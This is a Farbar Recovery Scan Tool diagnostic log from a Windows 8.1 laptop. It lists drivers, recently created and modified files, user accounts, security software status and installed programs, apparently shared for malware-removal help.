S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [15488 2016-06-23] (ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [197248 2016-11-30] (ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [153216 2016-11-30] (ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [208520 2016-11-30] (ESET)
R1 EpfwLWF; C:\WINDOWS\system32\DRIVERS\EpfwLWF.sys [61568 2016-11-30] (ESET)
R0 epfwwfp; C:\WINDOWS\System32\DRIVERS\epfwwfp.sys [84616 2016-11-30] (ESET)
S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [17480 2013-03-07] () [File not signed]
S3 epmntdrv; C:\WINDOWS\SysWOW64\epmntdrv.sys [13896 2013-03-07] () [File not signed]
S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [9800 2013-03-07] () [File not signed]
S3 EuGdiDrv; C:\WINDOWS\SysWOW64\EuGdiDrv.sys [9160 2013-03-07] () [File not signed]
S3 ewusbnet; C:\WINDOWS\system32\DRIVERS\ewusbnet.sys [256000 2015-11-10] (Huawei Technologies Co., Ltd.)
R0 fsbts; C:\WINDOWS\System32\Drivers\fsbts.sys [75448 2016-05-12] ()
R2 PEGAGFN; C:\Program Files (x86)\TOSHIBA\PasswordUtility\PEGAGFN.sys [14344 2009-09-12] (PEGATRON)
S3 ptun0901; C:\WINDOWS\system32\DRIVERS\ptun0901.sys [27136 2016-04-21] (The OpenVPN Project)
S3 SliceDisk5; C:\Program Files\A-FF Find and Mount\slicedisk-x64.sys [31824 2011-02-25] (Atola) [File not signed]
S3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [34544 2013-08-22] (Synaptics Incorporated)
R0 THAccel; C:\WINDOWS\System32\DRIVERS\THAccel.sys [111488 2013-10-16] (TOSHIBA Corporation)
R3 Thotkey; C:\WINDOWS\System32\drivers\Thotkey.sys [33168 2013-10-10] (Windows ® Win 7 DDK provider)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-02-16] (AVG Netherlands B.V.)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [88592 2014-01-16] (Intel Corporation)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-02] ()
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [35856 2013-10-31] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [236888 2013-10-31] (Microsoft Corporation)
S3 wdf_usb; C:\WINDOWS\system32\drivers\usb2ser.sys [67192 2011-05-20] (MediaTek Inc.)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [124760 2013-10-31] (Microsoft Corporation)
S3 dpclat_driver; \??\C:\WINDOWS\system32\drivers\dpclat_driver.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-12-02 01:55 - 2016-12-02 01:55 - 00000000 ____D C:\FRST
2016-12-02 01:51 - 2016-12-02 01:51 - 00001104 _____ C:\Users\Public\Desktop\Revo Uninstaller Pro.lnk
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\VS Revo Group
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\ProgramData\VS Revo Group
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller Pro
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\Program Files\VS Revo Group
2016-12-02 01:51 - 2009-12-30 11:21 - 00031800 _____ (VS Revo Group) C:\WINDOWS\system32\Drivers\revoflt.sys
2016-12-01 22:13 - 2016-12-01 22:19 - 00000261 ____H C:\Users\Ptr. Julius Lampao\Desktop\test.txt
2016-12-01 20:16 - 2016-12-01 22:13 - 00000526 ____H C:\Users\Ptr. Julius Lampao\Desktop\FB2Test.bat
2016-11-30 18:06 - 2016-11-30 18:06 - 00153216 _____ (ESET) C:\WINDOWS\system32\Drivers\ekbdflt.sys
2016-11-29 10:55 - 2016-11-30 10:39 - 04757497 _____ C:\Users\Ptr. Julius Lampao\Desktop\14TH MENS FEL.pptx
2016-11-27 23:13 - 2016-11-27 23:14 - 00001261 _____ C:\Users\Ptr. Julius Lampao\Desktop\FacebookShortCut.lnk
2016-11-27 23:12 - 2016-12-01 22:31 - 00000780 _____ C:\Users\Ptr. Julius Lampao\Documents\FB2.bat
2016-11-27 23:05 - 2016-11-27 23:07 - 00000084 _____ C:\Users\Ptr. Julius Lampao\Documents\FBChat.bat
2016-11-27 23:05 - 2016-11-27 23:05 - 00000412 _____ C:\Users\Ptr. Julius Lampao\Documents\fb.bat
2016-11-26 15:26 - 2016-11-26 15:40 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\thanksgiving, 2016
2016-11-26 09:04 - 2016-11-26 09:10 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Dream Aquarium
2016-11-26 07:51 - 2016-11-26 08:16 - 00060211 _____ C:\Users\Ptr. Julius Lampao\Documents\worship song..pptx
2016-11-25 16:54 - 2016-11-30 21:07 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\ViberPC
2016-11-25 16:54 - 2016-11-26 10:40 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Viber
2016-11-25 16:54 - 2016-11-25 16:54 - 00000992 _____ C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Viber.lnk
2016-11-25 16:54 - 2016-11-25 16:54 - 00000990 _____ C:\Users\Ptr. Julius Lampao\Desktop\Viber.lnk
2016-11-25 16:54 - 2016-11-25 16:54 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Viber
2016-11-25 16:54 - 2016-11-25 16:54 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Package Cache
2016-11-21 00:55 - 2016-11-21 00:55 - 00000196 _____ C:\Users\Ptr. Julius Lampao\Documents\jhgfcghjk.txt
2016-11-19 23:57 - 2016-11-19 23:59 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
2016-11-12 05:51 - 2016-11-12 05:51 - 00000028 _____ C:\Users\Ptr. Julius Lampao\Downloads\link.txt
2016-11-08 17:07 - 2016-11-08 18:06 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\Corel VideoStudio Pro
2016-11-08 17:05 - 2016-11-08 21:17 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Ulead Systems
2016-11-08 17:02 - 2016-11-08 17:07 - 00000000 ____D C:\ProgramData\Protexis64
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Haali Media Splitter
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Corel
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Haali Media Splitter
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Program Files (x86)\Haali
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Program Files (x86)\Corel
2016-11-08 16:57 - 2016-11-08 16:57 - 00001980 _____ C:\Users\Public\Desktop\VidеоStudiо Х9 Тrаining.lnk
2016-11-08 16:57 - 2016-11-08 16:57 - 00000000 ____D C:\Program Files\Common Files\Protexis
2016-11-08 16:56 - 2016-11-08 16:57 - 00000000 ____D C:\ProgramData\Corel
2016-11-08 16:54 - 2016-11-08 16:54 - 00001015 _____ C:\Users\Public\Desktop\Corel VideoStudio X9.lnk
2016-11-08 16:54 - 2016-11-08 16:54 - 00001015 _____ C:\Users\Public\Desktop\Corel FastFlick X9.lnk
2016-11-08 16:54 - 2016-11-08 16:54 - 00001010 _____ C:\Users\Public\Desktop\Corel ScreenCap X9.lnk
2016-11-08 16:54 - 2016-11-08 16:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Corel VideoStudio X9
2016-11-08 16:52 - 2016-11-08 16:52 - 00000000 ____D C:\Program Files\Corel
2016-11-08 15:42 - 2016-11-08 15:42 - 00000000 ____D C:\ProgramData\UniqueId
2016-11-08 15:33 - 2016-11-08 15:33 - 00017292 _____ C:\Users\Ptr. Julius Lampao\Documents\piougyfghj.txt
2016-11-05 14:28 - 2016-11-05 14:28 - 00000892 _____ C:\Users\Ptr. Julius Lampao\Desktop\Internet Download Manager.lnk
2016-11-05 14:28 - 2016-11-05 14:28 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2016-11-05 14:28 - 2016-11-05 14:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-12-02 02:00 - 2016-07-07 22:00 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\CrashDumps
2016-12-02 01:49 - 2014-12-10 04:04 - 00003970 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{396F5124-4C87-4957-8CE7-D1626169AA55}
2016-12-02 01:39 - 2014-12-02 14:16 - 00000000 ____D C:\Users\Ptr. Julius Lampao
2016-12-02 01:30 - 2015-08-29 06:08 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\choral 2015
2016-12-02 01:30 - 2014-12-12 10:20 - 00003758 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2016-12-02 01:25 - 2016-01-21 09:03 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\DMCache
2016-12-02 01:16 - 2016-10-15 20:16 - 00000933 _____ C:\WINDOWS\Tasks\EPSON L220 Series Update {441D2E96-17AE-4DAF-957A-A09CD9765B46}.job
2016-12-01 20:23 - 2016-01-21 09:03 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM
2016-12-01 19:25 - 2016-07-14 19:27 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\Men's
2016-12-01 19:22 - 2015-10-30 23:44 - 00003894 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-12-01 19:22 - 2015-10-30 23:44 - 00003658 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-12-01 19:22 - 2015-10-30 23:44 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-12-01 19:22 - 2015-10-30 23:44 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-12-01 17:02 - 2016-01-21 09:08 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\vlc
2016-11-30 18:55 - 2013-08-22 22:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-11-30 18:55 - 2013-08-22 21:36 - 00000000 ____D C:\WINDOWS\Inf
2016-11-30 18:54 - 2013-08-22 21:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-11-30 18:06 - 2016-06-23 14:31 - 00061568 _____ (ESET) C:\WINDOWS\system32\Drivers\EpfwLWF.sys
2016-11-30 18:06 - 2014-09-18 12:38 - 00084616 _____ (ESET) C:\WINDOWS\system32\Drivers\epfwwfp.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00262792 _____ (ESET) C:\WINDOWS\system32\Drivers\eamonm.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00208520 _____ (ESET) C:\WINDOWS\system32\Drivers\epfw.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00199304 _____ (ESET) C:\WINDOWS\system32\Drivers\edevmon.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00197248 _____ (ESET) C:\WINDOWS\system32\Drivers\ehdrv.sys
2016-11-30 15:52 - 2015-04-02 17:42 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\HYMNAL
2016-11-30 15:34 - 2016-04-02 18:30 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\songs
2016-11-30 11:49 - 2016-01-21 15:28 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Bibletime
2016-11-30 08:19 - 2016-04-21 21:08 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Skype
2016-11-30 08:19 - 2015-10-19 23:24 - 00000000 ____D C:\Program Files (x86)\Tonec
2016-11-29 23:14 - 2013-12-09 19:36 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-11-28 09:13 - 2015-10-13 17:10 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\ElevatedDiagnostics
2016-11-27 21:12 - 2014-12-02 14:22 - 00003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1061507693-3713582409-3664479191-1001
2016-11-26 11:28 - 2015-03-25 22:25 - 00000000 ____D C:\ProgramData\CanonIJPLM
2016-11-22 02:10 - 2014-12-02 14:16 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Packages
2016-11-20 23:39 - 2013-08-22 23:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-11-20 23:39 - 2013-08-22 23:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-11-20 19:56 - 2016-09-26 22:35 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Downloads\SHAREit
2016-11-17 23:24 - 2013-08-22 23:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-11-17 20:23 - 2015-06-21 22:02 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\English 6
2016-11-17 11:59 - 2015-04-12 20:08 - 00004478 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-11-17 11:42 - 2015-09-12 15:39 - 00000000 ____D C:\WINDOWS\Minidump
2016-11-17 11:42 - 2013-08-22 22:44 - 00574008 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-11-16 23:46 - 2016-09-21 12:29 - 00003600 _____ C:\WINDOWS\System32\Tasks\AVG EUpdate Task
2016-11-11 18:16 - 2015-06-21 22:04 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\Math 6
2016-11-08 16:51 - 2014-02-08 11:54 - 00000000 ____D C:\ProgramData\Package Cache
2016-11-08 13:31 - 2016-10-19 23:09 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Windows Live
2016-11-04 23:17 - 2016-10-29 21:28 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Downloads\files
2016-11-02 13:19 - 2016-03-01 13:56 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
 
==================== Files in the root of some directories =======
 
2014-12-10 03:06 - 2004-07-30 08:56 - 0090112 _____ () C:\Program Files (x86)\Common Files\PCSBclean.exe
2014-12-10 03:06 - 2004-07-26 14:30 - 0291840 _____ () C:\Program Files (x86)\Common Files\PCSBoff.exe
2016-07-19 01:18 - 2016-08-09 20:16 - 0000132 _____ () C:\Users\Ptr. Julius Lampao\AppData\Roaming\Adobe PNG Format CC Prefs
2016-08-04 22:41 - 2016-08-04 22:43 - 0341504 _____ () C:\Users\Ptr. Julius Lampao\AppData\Roaming\wsrv_f8869065.dat
2016-10-03 19:10 - 2016-10-03 19:10 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{0441AFAA-FDAF-4605-BF71-40BE2F336494}
2016-10-08 17:44 - 2016-10-08 17:44 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{0A7739D2-4DF1-4CEF-B71B-40D21A823889}
2016-10-02 16:43 - 2016-10-02 16:43 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{4442C9CD-07EF-446A-9982-69402F2EC4B7}
2016-06-05 15:11 - 2016-06-05 15:11 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{465D4095-6B8E-4DE1-BDD8-20EEA3A57C49}
2015-07-01 20:51 - 2015-07-01 20:51 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{76638D49-B073-48B3-8725-4D75677A6AA4}
2015-07-01 20:51 - 2015-07-01 20:51 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{76F76F48-DFA6-48B3-964E-AF594BD66012}
2016-06-04 13:28 - 2016-06-04 13:28 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{8E6B0E3F-C487-4A3F-BE1E-8FF8837B9B43}
2016-10-05 13:02 - 2016-10-05 13:02 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{B264875B-AF39-4B7F-97DE-DCE34DBD0B1E}
2016-10-07 16:34 - 2016-10-07 16:34 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{BBC5CA8C-0D54-454C-A8A8-A604ED457799}
2016-10-06 16:10 - 2016-10-06 16:10 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{BD578060-BAA7-4629-8B58-DB15B706B92A}
2016-06-06 20:18 - 2016-06-06 20:18 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{CCF83A90-ABC0-4067-BDCD-1A2C55BB7471}
2016-06-04 13:28 - 2016-06-04 13:28 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{D2C4B430-55FD-4A38-9609-D3CFA32F320D}
2016-10-03 19:10 - 2016-10-03 19:10 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{D9490B89-A21D-4FFF-AA26-F756E2B7CF35}
2016-04-07 19:33 - 2016-04-07 19:33 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{F6594D30-1DF8-4558-A65A-27566DC8CAE7}
2014-02-08 11:39 - 2014-02-08 11:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-02-28 19:54 - 2016-02-28 19:54 - 0010218 _____ () C:\ProgramData\regid.2015-05.exe.textpad_83F5EF12-C2F9-4C11-A5C5-57A7B2D7AD25.swidtag
 
Files to move or delete:
====================
C:\Users\Ptr. Julius Lampao\cnmss Canon iP2700 series (Local).dll
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-11-28 09:13
 
==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by Ptr. Julius Lampao (02-12-2016 02:00:58)
Running from C:\Users\Ptr. Julius Lampao\Downloads\Programs
Windows 8.1 (Update) (X64) (2014-12-02 06:16:42)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1061507693-3713582409-3664479191-500 - Administrator - Disabled)
Guest (S-1-5-21-1061507693-3713582409-3664479191-501 - Limited - Disabled)
John Doe (S-1-5-21-1061507693-3713582409-3664479191-1002 - Limited - Enabled)
Ptr. Julius Lampao (S-1-5-21-1061507693-3713582409-3664479191-1001 - Administrator - Enabled) => C:\Users\Ptr. Julius Lampao

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: ESET Smart Security 9.0.408.0 (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET Smart Security 9.0.408.0 (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ESET Personal firewall (Enabled) {D426EE12-AE7E-4602-F40F-BBCA8137EB0B}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Reader XI (11.0.03) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.18) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.18 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\AmUStor) (Version: 4.8.1245.73583 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 4.8.1245.73583 - Alcor Micro Corp.) Hidden
Angry Birds Rio (HKLM-x32\...\{4933D2E2-B621-487F-A7E7-96DA7312BCFE}) (Version: 1.3.2 - Rovio)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Atheros)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.62.2.46691 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.62.4 - AVG Technologies) Hidden
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
BibleTime for Windows (HKLM-x32\...\BibleTime) (Version: 2.6.1 - hxxp://www.bibletime.info)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.1.0 - Canon Inc.)
Canon iP2700 series Printer Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP2700_series) (Version: - Canon Inc.)
Canon Utilities Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version: - )
Canon Utilities My Printer (HKLM-x32\...\CanonMyPrinter) (Version: - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version: - )
Contents64 (Version: 19.5.0.35 - Corel Corporation) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dream Aquarium (HKLM-x32\...\Dream Aquarium) (Version: - )
EaseUS Partition Master 9.2.2 (HKLM-x32\...\EaseUS Partition Master_is1) (Version: - EaseUS)
EPSON L220 Series Printer Uninstall (HKLM\...\EPSON L220 Series) (Version: - SEIKO EPSON Corporation)
EPSON Manuals (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.40.0.0 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{B4F0E794-11F5-4971-85EC-6D7F2E4DAC68}) (Version: 4.4.3 - SEIKO EPSON CORPORATION)
ESET Smart Security (HKLM\...\{C20E6525-879A-47C3-BBC4-6B8096D3F53D}) (Version: 9.0.386.0 - ESET, spol. s r.o.)
Find and Mount 2.32 (HKLM\...\Find and Mount_is1) (Version: 2.32 - A-FF Data Recovery)
FMW 1 (Version: 1.132.1 - AVG Technologies) Hidden
Foxit PhantomPDF Business (HKLM-x32\...\{8A601904-4113-40FE-9DCC-7A38CE1A8032}) (Version: 7.0.6.1126 - Foxit Software Inc.)
Globe Tattoo Broadband (HKLM-x32\...\Globe Tattoo Broadband) (Version: 21.005.11.00.158 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Haali Media Splitter (HKLM-x32\...\HaaliMkx) (Version: - )
HP Deskjet 1510 series Basic Device Software (HKLM\...\{D17E60E8-478A-4D4A-8147-21D481B5CA55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
ICA (x32 Version: 19.5.0.35 - Corel Corporation) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1050 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
IPM_VS_Pro64 (Version: 19.0 - Corel Corporation) Hidden
Java 8 Update 73 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Java SE Development Kit 7 Update 79 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0170790}) (Version: 1.7.0.790 - Oracle)
Kits Configuration Installer (x32 Version: 8.100.25984 - Microsoft) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Microsoft Encarta Premium 2009 (HKLM-x32\...\{09040081-2C94-4A67-8E55-8483C019C7D2}) (Version: 2009 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{d07b0db5-8dad-40e1-be90-88026298a46b}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{2749c485-3a8b-4533-92ff-7cf6e8221cff}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 35.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0 (x86 en-US)) (Version: 35.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 35.0 - Mozilla)
NetBeans IDE 8.0.2 (HKLM\...\nbi-nb-base-8.0.2.0.201411181905) (Version: 8.0.2 - NetBeans.org)
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PC Study Bible (remove only) (HKLM-x32\...\PC Study Bible) (Version: - )
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.306 - Qualcomm Atheros)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
